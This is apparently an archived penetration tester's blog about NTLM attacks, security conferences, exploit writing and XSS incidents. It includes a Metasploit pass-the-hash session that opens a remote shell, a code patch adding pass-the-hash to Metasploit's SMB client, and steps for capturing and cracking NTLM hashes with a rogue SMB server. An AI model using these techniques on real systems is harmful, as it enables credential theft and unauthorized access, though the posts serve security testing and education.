Skip navigation

Category Archives: security

John Heasman just posted a rocking method of obtaining NTLM hashes out of an enterprise by turning a Java applet into a web server! Check it out!

This year I’ll be presenting at DefCon on the history of NTLM attacks, how they work and why we need to get rid of it. I’ll release a tool that will combine as many hacks as I can get working to use captured users and their authentication tokens. There’s been a lot of talk in the past few years about browser security and it’s mostly hinged around using Javascript as a port scanner, sending attacks through the browser, attacking the platforms, etc. Few have been talking about an Enterprise-class risk and since that’s what I get paid to think about I’m gonna blow it open. 🙂 Come to DefCon and have a great time!

SyScan was great, a little small but helpful to bring the confidence up speaking to people who have no clue who I am! I learned quite a bit about my speaking style which helped firm up ideas about the DefCon presentation. I presented a combination of Web Security Mistakes including how to get a free MacWorld pass and spoke more about the future of PokeHashBall.

We stayed a few extra days to soak up the culture and soak the sweat into our clothes some more since this was our first trip to Hong Kong. The MongKok Computer Center was interesting but didn’t seem to really have the deals I was expecting. I didn’t get to any of the other computer centers however. Maybe next trip!

We went through Narita airport on the way back so I stopped at Duty Free and bought a bottle of Suntory Whiskey, the kind Bill Murray is hawking in the movie “Lost In Translation”. For relaxing times, make it Santory time. . .

Continuing the tradition of (NY|Chi|Bay|*)Sec groupings of infosec people without a vendor bent, announcing BERKSEC 0001 – just because, why not, it’s not in SF.

Come on by the Albatross Pub on Tuesday, Oct 30 at 7:30 or 8pm or later… Look for the long haired guy with a Toorcon t-shirt and join us.

Things got a little busy/crazy around here so I’m not satisfied with what I have done so far so no code yet. This past weekend was Toorcon 1001 and it was as enjoyable as ever. I had a few breakthrough ideas thanks to the talks and side chats with everybody. That’s mostly why I’m not satisfied — always room for improvement. 🙂

I promise to show something soon. Really.

Surprisingly Metasploit 3’s SMB auth routines didn’t support “pass the hash” so I took some time and put it in.

msf exploit(ms06_040_netapi) > set SMBPass 6A98EB0FB88A449CBE6FABFD825BCA61:A4141712F19E9DD5ADF16919BB38A95C
SMBPass => 6A98EB0FB88A449CBE6FABFD825BCA61:A4141712F19E9DD5ADF16919BB38A95C
msf exploit(ms06_040_netapi) > set SMBUser Administrator
SMBUser => Administrator
msf exploit(ms06_040_netapi) > exploit

[*] Started bind handler
[*] Doing pass the hash.
[*] LM: 6A98EB0FB88A449CBE6FABFD825BCA61
[*] NT: A4141712F19E9DD5ADF16919BB38A95C
[*] Detected a Windows 2000 target
[*] Binding to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:[\BROWSER] …
[*] Bound to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:[\BROWSER] …
[*] Building the stub data…
[*] Calling the vulnerable function…
[*] Command shell session 1 opened ( ->

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.


The Patch:

Index: lib/rex/proto/smb/client.rb
— lib/rex/proto/smb/client.rb (revision 4889)
+++ lib/rex/proto/smb/client.rb (working copy)
@@ -568,8 +568,13 @@

raise XCEPT::NTLM1MissingChallenge if not self.challenge_key

– hash_lm = pass.length > 0 ? CRYPT.lanman_des(pass, self.challenge_key) : ”
– hash_nt = pass.length > 0 ? CRYPT.ntlm_md4(pass, self.challenge_key) : ”
+ if (pass.length == 65)
+ hash_lm = CRYPT.e_p24( [ pass.upcase()[0,32] ].pack(‘H42’), self.challenge_key)
+ hash_nt = CRPYT.e_p24( [ pass.upcase()[33,65] ].pack(‘H42’), self.challenge_key)
+ else
+ hash_lm = pass.length > 0 ? CRYPT.lanman_des(pass, self.challenge_key) : ”
+ hash_nt = pass.length > 0 ? CRYPT.ntlm_md4(pass, self.challenge_key) : ”
+ end

data = ”
data << hash_lm
@@ -690,7 +695,11 @@
nonce = CRYPT.md5_hash(self.challenge_key + client_challenge)

# Generate the NTLM hash
– resp_ntlm = CRYPT.ntlm_md4(pass, nonce[0, 8])
+ if (pass.length == 65)
+ resp_ntlm = CRYPT.e_p24( [ pass.upcase()[33,65] ].pack(‘H42’), nonce[0, 8])
+ else
+ resp_ntlm = CRYPT.ntlm_md4(pass, nonce[0, 8])
+ end

# Generate the fake LANMAN hash
resp_lmv2 = client_challenge + (“\x00” * 16)

In Metasploit 2.7 there existed a moduled called “smb_sniffer” that listened as a Windows SMB server, responded to negotiations with a preset challenge and forced crypto to NTLMv1. When I asked the devs about it they said it was for “future purposes.”

That future purpose is now documented!

Step 1 – Download my slightly updated version from here and place it in your exploits/ directory.

Step 2a – Run it with root privs on a UNIX host (doesn’t work on Windows, sorry).
Step 2b – Have a Windows machine connect to your “share” – they will get an access denied but stuff like will work.

Step 3 – Send the hashes to Cain & Abel for cracking or cryptanalysis! Obtain the HALFLMCHALL tables from FreeRainbowCrack.Com or run a brute force, dictionary, hybrid, etc.

Step 4 – Success!

One caveat — the half-lm challenge table only does the first 7 characters of LANMAN. You still have to brute force the last 7 and if the user’s password is greater than 14 characters, you’re really out of luck.

Enjoy! 🙂

I was reading a review of the Yoggie Gatekeeper Pro in this month’s SC Magazine. It’s a neat little device that hides your PC behind a Linux firewall-appliance when connecting to an untrusted network. The voodoo of how it shims itself into your Windows networking stack so you can connect to a wireless network and still be protected through the Yoggie aside — one thing about the review really made my hair bristle:

Using our vulnerability assessment tool (NetClarity) and our penetration tool (Core Impact) we were unable to compromisethe Gatekeeper or the computer behind it.
– SC Magazine, April 2007, Pg 63

Well duh.

Both the tools listed are only as strong as their signatures, exploits and platform shellcode. That statement is like running Core Impact against a copy of OpenVMS and saying IMPENETRABLE! when you’re done. Technically it’s valid but it’s no measure of strength.

Maybe these statements are made because of a contractual obligation. “Say our product name five times and we’ll give you free copies” sort of thing. Unfortunately there will be InfoSec managers and the like who will listen and wonder if maybe they should use these tools in lieu of hiring security professionals who actually know something.

Maybe I’m just being too overly critical and hypersensitive about this. I don’t think I am as I’ve looked at a number of Web Application Security tools on the market and none of them have been able to find the more serious vulnerabilities vs. a team of two or three highly skilled testers have. We still need good QA but attack Frameworks like CORE Impact, Canvas and Metasploit aren’t automated tools. Don’t treat them as such.

Security Opus rocked. Very laid back attitude (hey, it’s San Francisco). Free drinks every night – thanks Microsoft, Richard and other sponsors! Great speakers and talks. Networking with friends in a relaxing environment. We’ll do it again in September I think. BE THERE!

Some of the topics you missed that I liked (and can remember right now):

  • Stefano Zanero ranted about Intrusion Detection|Prevention Systems. Stuff many of us have been saying for a long time like “Real-time response is not really possible” but he had the math and pretty graphs to prove it to management. IDS isn’t dead but it’s never been a killer app in my opinion. It is still very important to have in any environment.
  • Cedric Blancher’s presentation on 802.11 security was insightful and I spoke with a few people who hadn’t yet heard about all of the attacks before.
  • Shawn Merdinger from VOIPSA showed a few of VoIP’s problems. He’s primarily focused on client/handset issues vs protocol weaknesses or server issues but his liquid-fueled talk was informative and put the spark back in me to finish setting up an asterisk server. So many projects, so little time!
  • Matt Hargett and Luis Miras have very strong opinions on source code analysis for vulnerabilities. It’s a topic I’m looking into this year for work and understand it’s a very difficult problem with no real good answer.
  • Whoever named it “Web 2.0” should stop trying to name things. I’m tired of seeing crap about “Web 2.0”. Every time somebody says it in a presentation, God kills a puppy or kitten from a no-kill shelter.

There were other talks about crytovirology, botnets, etc. Show your support and come in September. My favorite quote from Richard Thieme: “Foreclose on the antelope!”

Richard cracks me up sometimes, especially when he and Simple Nomad get to talking about UFOs and secret government projects (last year’s SecurityOpus).

In other news, some more projects, exploits and scripts will be uploaded sometime this week when I get around to cleaning them up. It’s been a busy week.

This week I wrote an exploit for a JRun vulnerability released in 2002! I was proud of myself as we rarely get the chance to write an overflow during a penetration test. Usually it’s all web exploits, unpatched windows systems, poor administration, etc. My friend said we found “the oldest box on his network.” So much for “no public exploits exist” as a mitigation! HA!

The hardest part of all this was getting a copy of the JRun software installed and running in a VM. It was so old the company (Allaire) had been bought twice so no installers could easily be found! A few hurdles later and within half a day I had a stable module written for Metasploit. Later in the evening I wrapped one up for Canvas. I don’t have a copy of CORE Impact – it’s a little expensive and, well, we do alright with what we have. 🙂

Dave Aitel once said he envisioned a future of exploit writing becoming a marketplace where they can be sold by third parties like ActiveX objects were in the early days of IE. Needed to do some video? Here’s a library that’ll help!

To be honest I don’t see that happening. There’s little value for me to spend some amount ($100 to $5000?) for a single exploit that may or may not work to “prove” the system is vulnerable. There’s so much wiggle area when exploiting a system, even with the protections provided by today’s frameworks, that it’ll just be too unreliable. I’d have a hard time justifying the cost but maybe that’s just me.

There’s been talk on the Metasploit mailing list of putting together an exploit module repository. Something centralized that can be maintained by developers. I’ve been searching for a project, maybe this will be it. 🙂 Anyone else that’s interested drop me a line. I envision a Trac Wiki + SVN repository with some core supporters and community submissions/requests. Of course we’ll have to weed out the 100s of “writemesumthin 2 hax myspace/yahoo/aim” but that’s part of the fun!

Until then.. enjoy my meager contributions:

SecurityOPUS is coming up March 19-21 here in San Francisco. It’s an awesome conference and I highly recommend coming — registration is still open. We don’t have many get-togethers here for some reason other than big marketing events like RSA. There’s a lot of talent in the bay area and this is a great way for the security community to come together more. Come! Learn! Enjoy! Eat some great food on Rich’s dime! Then later come to our OWASP meetings. They’re lots of fun and free beer when iSEC Partners hosts. 🙂

The security freaks at Watchfire recently released an amazing piece of research against Google Desktop. If you use this product it’s best to update it now.

PDF and an awesome Adobe Flash presentation are worth checking out.

Essentially through Cross-site Scripting and a Javascript command and control API they’ve shown the ability to fully compromise a device. All of it can be automated.

As a web user I’ve been afraid of client-side language interpreters for a long time. Javascript, ActiveX, Java, etc — they take too much control away from my PC and give it to web servers. Blogs, forums, malicious trojan servers, etc all can carry dangerous payloads that will run unnoticed to me because that’s how the user experience is.

This year is going to be fun. 🙂

This morning I awoke to find an urgent posting from Websense. Somebody had placed a bit of javascript on the Dolphin Stadium website @ Don’t worry, it’s not there anymore. This weekend is the Superbowl and a LOT of football could very well visit this site and if they haven’t updated their Internet Explorer in a while they’d find a keylogger and backdoor installed on their PC.

A pretty big issue that was resolved fairly quickly by the host removing the offending source but our comfort level with that site is shaky now. How did the attackers get in, did they close the hole or just put some silly putty over it? We may never know.

The malicious code turns out to be a javascript file called 3.js loaded from a website named A very quick googledork search found something interesting:

The CDC’s podcast site! They’ve since brought down their system for repairs.

The site has been removed as well but how many people already had their machines trojaned?

This attack is called “Persistent Cross Site Scripting (XSS).” in that the malicious JavaScript code gets left behind on the web application, usually as a database entry that is displayed at some point during the user’s experience. When a somebody goes to visit the website the malicious code is loaded and, in this particular case, bad things happen to the browser if it hasn’t been patched against two recent Microsoft bugs (MS06-014 and MS07-004).

There are a lot of XSS bugs out there. Michael Sutton did a massive check and reliably confirmed that out of 272 sites, 47 (17.3%) of them had a XSS vulnerability. The XSS Wall of Shame at the forum never stops, most of them being non-persistent.

Browsing the web with a JavaScript-enabled browser is just plain dangerous. It’s not just those ‘seedy’ underground sites you should avoid, it’s everywhere.

Some very good resources on XSS and its very real threats: